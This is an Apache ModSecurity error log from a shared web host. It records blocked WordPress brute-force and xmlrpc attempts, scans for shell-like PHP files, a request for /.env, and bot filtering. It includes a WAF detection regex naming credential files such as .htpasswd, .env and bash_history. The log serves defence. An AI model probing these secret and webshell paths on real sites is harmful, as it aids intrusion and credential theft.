[Tue May 26 18:37:25.198659 2026] [security2:error] [pid 1015481:tid 1015672] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbDLQIKfWDMlp2INdDcAAAAUc"]
[Tue May 26 18:37:26.237615 2026] [security2:error] [pid 1015481:tid 1015564] [remote 208.68.37.246:44562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.37.68.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWbDrQIKfWDMlp2INdDiQABXVI"], referer: https://shahvishaal.moes-art.com/wp-login.php
[Tue May 26 18:37:27.079659 2026] [security2:error] [pid 1015481:tid 1015707] [client 173.252.87.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahWbDrQIKfWDMlp2INdDmQAAAWo"]
[Tue May 26 18:37:27.463255 2026] [security2:error] [pid 1015481:tid 1015734] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbD7QIKfWDMlp2INdDnwAAAYU"]
[Tue May 26 18:37:27.999698 2026] [security2:error] [pid 1015481:tid 1015552] [remote 193.42.61.12:49416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWbD7QIKfWDMlp2INdDuwABWEY"]
[Tue May 26 18:37:30.799989 2026] [security2:error] [pid 1015481:tid 1015698] [client 124.43.5.103:21731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbErQIKfWDMlp2INdEBAAAAWE"]
[Tue May 26 18:37:30.800093 2026] [security2:error] [pid 1015481:tid 1015698] [client 124.43.5.103:21731] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbErQIKfWDMlp2INdEBAAAAWE"]
[Tue May 26 18:37:30.875815 2026] [security2:error] [pid 1015481:tid 1015713] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbErQIKfWDMlp2INdD_wAAAXA"]
[Tue May 26 18:37:30.937330 2026] [security2:error] [pid 1015481:tid 1015579] [remote 195.22.7.28:47184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.7.22.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWbErQIKfWDMlp2INdEAAABa2E"]
[Tue May 26 18:37:31.140612 2026] [proxy:error] [pid 1015481:tid 1015622] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:37:31.140673 2026] [proxy_http:error] [pid 1015481:tid 1015622] [client 3.139.242.79:50341] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:37:31.141238 2026] [proxy:error] [pid 1015481:tid 1015622] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:37:31.141271 2026] [proxy_http:error] [pid 1015481:tid 1015622] [client 3.139.242.79:50341] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:37:31.942852 2026] [security2:error] [pid 1015481:tid 1015609] [remote 195.22.7.28:47184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.7.22.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWbE7QIKfWDMlp2INdEJQABMH8"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:37:32.126949 2026] [security2:error] [pid 1015481:tid 1015600] [remote 216.73.216.30:13118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWbFLQIKfWDMlp2INdEJwABT3Y"]
[Tue May 26 18:37:32.228320 2026] [security2:error] [pid 1015481:tid 1015605] [remote 211.23.68.235:19332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbFLQIKfWDMlp2INdEJgABG3s"]
[Tue May 26 18:37:32.756106 2026] [security2:error] [pid 1015481:tid 1015608] [remote 38.95.35.74:37808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWbFLQIKfWDMlp2INdEMgABLX4"]
[Tue May 26 18:37:32.815467 2026] [security2:error] [pid 1015481:tid 1015683] [client 20.206.67.134:2658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-plain.php"] [unique_id "ahWbFLQIKfWDMlp2INdENwAAAVI"], referer: www.google.com
[Tue May 26 18:37:32.821444 2026] [security2:error] [pid 1015481:tid 1015729] [client 20.206.67.134:2677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWbFLQIKfWDMlp2INdEOAAAAYA"], referer: www.google.com
[Tue May 26 18:37:33.005668 2026] [security2:error] [pid 1015481:tid 1015598] [remote 38.95.35.74:37808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWbFLQIKfWDMlp2INdEPAABYnQ"], referer: https://jhonparra.com/wp-login.php
[Tue May 26 18:37:33.008826 2026] [core:error] [pid 1015481:tid 1015708] (104)Connection reset by peer: [client 20.206.67.134:2680] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 18:37:34.340483 2026] [security2:error] [pid 1015481:tid 1015687] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbFbQIKfWDMlp2INdEWQAAAVY"]
[Tue May 26 18:37:34.783774 2026] [security2:error] [pid 1015481:tid 1015631] [client 20.206.67.134:2625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/acfkxdph.php"] [unique_id "ahWbFrQIKfWDMlp2INdEaAAAAR4"], referer: www.google.com
[Tue May 26 18:37:35.118502 2026] [security2:error] [pid 1015481:tid 1015585] [remote 91.134.89.60:32916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWbFrQIKfWDMlp2INdEbgABXWc"]
[Tue May 26 18:37:35.353681 2026] [security2:error] [pid 1015481:tid 1015588] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbF7QIKfWDMlp2INdEegABX2o"]
[Tue May 26 18:37:35.353876 2026] [security2:error] [pid 1015481:tid 1015696] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbF7QIKfWDMlp2INdEegABX2o"]
[Tue May 26 18:37:36.281929 2026] [security2:error] [pid 1015481:tid 1015645] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbF7QIKfWDMlp2INdEjQAAASw"]
[Tue May 26 18:37:36.544219 2026] [security2:error] [pid 1015481:tid 1015616] [client 20.206.67.134:2671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWbGLQIKfWDMlp2INdEmwAAAQ8"], referer: www.google.com
[Tue May 26 18:37:38.005241 2026] [security2:error] [pid 1015481:tid 1015693] [client 20.206.67.134:2648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-plain.php"] [unique_id "ahWbGrQIKfWDMlp2INdEuAAAAVw"], referer: www.google.com
[Tue May 26 18:37:39.072393 2026] [security2:error] [pid 1015481:tid 1015652] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbGrQIKfWDMlp2INdEyQAAATM"]
[Tue May 26 18:37:39.984936 2026] [core:error] [pid 1015481:tid 1015666] (104)Connection reset by peer: [client 20.206.67.134:2184] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 18:37:40.135536 2026] [security2:error] [pid 1015481:tid 1015696] [client 20.206.67.134:2183] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/jdusfqso.php"] [unique_id "ahWbHLQIKfWDMlp2INdE-gAAAV8"], referer: www.google.com
[Tue May 26 18:37:41.609348 2026] [security2:error] [pid 1015481:tid 1015687] [client 124.43.5.103:21975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbHbQIKfWDMlp2INdFHwAAAVY"]
[Tue May 26 18:37:41.609606 2026] [security2:error] [pid 1015481:tid 1015687] [client 124.43.5.103:21975] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbHbQIKfWDMlp2INdFHwAAAVY"]
[Tue May 26 18:37:41.800664 2026] [security2:error] [pid 1015481:tid 1015724] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbHbQIKfWDMlp2INdFFQAAAXs"]
[Tue May 26 18:37:43.934808 2026] [security2:error] [pid 1015481:tid 1015657] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbH7QIKfWDMlp2INdFTgAAATg"]
[Tue May 26 18:37:44.331334 2026] [security2:error] [pid 1015481:tid 1015643] [client 198.244.168.191:26380] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.plenitudotonal.com"] [uri "/robots.txt"] [unique_id "ahWbILQIKfWDMlp2INdFawAAASo"]
[Tue May 26 18:37:44.331456 2026] [security2:error] [pid 1015481:tid 1015643] [client 198.244.168.191:26380] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.plenitudotonal.com"] [uri "/robots.txt"] [unique_id "ahWbILQIKfWDMlp2INdFawAAASo"]
[Tue May 26 18:37:45.706249 2026] [security2:error] [pid 1015481:tid 1015644] [client 51.161.37.190:51304] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.plenitudotonal.com"] [uri "/"] [unique_id "ahWbIbQIKfWDMlp2INdFlwAAASs"]
[Tue May 26 18:37:45.706369 2026] [security2:error] [pid 1015481:tid 1015644] [client 51.161.37.190:51304] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.plenitudotonal.com"] [uri "/"] [unique_id "ahWbIbQIKfWDMlp2INdFlwAAASs"]
[Tue May 26 18:37:45.992338 2026] [security2:error] [pid 1015481:tid 1015535] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbIbQIKfWDMlp2INdFogABUjU"]
[Tue May 26 18:37:45.992563 2026] [security2:error] [pid 1015481:tid 1015683] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbIbQIKfWDMlp2INdFogABUjU"]
[Tue May 26 18:37:46.863193 2026] [security2:error] [pid 1015481:tid 1015688] [client 161.129.170.158:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWbIrQIKfWDMlp2INdFtAAAAVc"]
[Tue May 26 18:37:46.966873 2026] [core:error] [pid 1015481:tid 1015620] (104)Connection reset by peer: [client 20.206.67.134:2200] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 18:37:47.321097 2026] [security2:error] [pid 1015481:tid 1015702] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbIrQIKfWDMlp2INdFvgAAAWU"]
[Tue May 26 18:37:48.202138 2026] [security2:error] [pid 1015481:tid 1015632] [client 176.65.139.233:23994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "atreegroup.com"] [uri "/.env"] [unique_id "ahWbJLQIKfWDMlp2INdGDAAAAR8"]
[Tue May 26 18:37:50.095110 2026] [security2:error] [pid 1015481:tid 1015587] [remote 178.104.164.71:48610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWbJbQIKfWDMlp2INdGNgABJ2k"]
[Tue May 26 18:37:50.835614 2026] [security2:error] [pid 1015481:tid 1015730] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbJrQIKfWDMlp2INdGQQAAAYE"]
[Tue May 26 18:37:52.084947 2026] [security2:error] [pid 1015481:tid 1015732] [client 205.169.39.11:38049] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWbKLQIKfWDMlp2INdGlgABgyo"], referer: https://politica-global.com/
[Tue May 26 18:37:52.504610 2026] [security2:error] [pid 1015481:tid 1015619] [client 124.43.5.103:59998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbKLQIKfWDMlp2INdG0gAAARI"]
[Tue May 26 18:37:52.504761 2026] [security2:error] [pid 1015481:tid 1015619] [client 124.43.5.103:59998] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbKLQIKfWDMlp2INdG0gAAARI"]
[Tue May 26 18:37:52.512079 2026] [security2:error] [pid 1015481:tid 1015652] [client 205.169.39.11:38049] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWbKLQIKfWDMlp2INdG4wABM34"], referer: https://politica-global.com/
[Tue May 26 18:37:53.954075 2026] [core:error] [pid 1015481:tid 1015637] (104)Connection reset by peer: [client 20.206.67.134:6402] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 18:37:54.400748 2026] [security2:error] [pid 1015481:tid 1015596] [remote 162.240.52.198:48092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbKrQIKfWDMlp2INdHHwABVXI"]
[Tue May 26 18:37:54.662914 2026] [security2:error] [pid 1015481:tid 1015595] [remote 162.240.52.198:48092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbKrQIKfWDMlp2INdHKwABgXE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:37:54.967445 2026] [security2:error] [pid 1015481:tid 1015727] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbKrQIKfWDMlp2INdHJQAAAX4"]
[Tue May 26 18:37:56.152129 2026] [security2:error] [pid 1015481:tid 1015500] [remote 54.38.29.86:55204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWbK7QIKfWDMlp2INdHRgABexI"]
[Tue May 26 18:37:56.804727 2026] [security2:error] [pid 1015481:tid 1015513] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbLLQIKfWDMlp2INdHWgABgx8"]
[Tue May 26 18:37:56.804942 2026] [security2:error] [pid 1015481:tid 1015732] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbLLQIKfWDMlp2INdHWgABgx8"]
[Tue May 26 18:37:58.298481 2026] [security2:error] [pid 1015481:tid 1015693] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbLbQIKfWDMlp2INdHgAAAAVw"]
[Tue May 26 18:38:00.969948 2026] [core:error] [pid 1015481:tid 1015704] (104)Connection reset by peer: [client 20.206.67.134:6431] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 18:38:00.987865 2026] [security2:error] [pid 1015481:tid 1015698] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbMLQIKfWDMlp2INdHvwAAAWE"]
[Tue May 26 18:38:01.688077 2026] [security2:error] [pid 1015481:tid 1015713] [client 74.7.175.192:38072] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "stvica.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWbMbQIKfWDMlp2INdH2gABcAo"]
[Tue May 26 18:38:01.804273 2026] [autoindex:error] [pid 1015481:tid 1015503] [remote 74.7.242.20:34774] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:38:02.156987 2026] [security2:error] [pid 1015481:tid 1015515] [remote 216.73.216.30:13118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWbMrQIKfWDMlp2INdH5QABIyE"]
[Tue May 26 18:38:03.280952 2026] [security2:error] [pid 1015481:tid 1015678] [client 124.43.5.103:60282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbM7QIKfWDMlp2INdH-gAAAU0"]
[Tue May 26 18:38:03.281235 2026] [security2:error] [pid 1015481:tid 1015678] [client 124.43.5.103:60282] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbM7QIKfWDMlp2INdH-gAAAU0"]
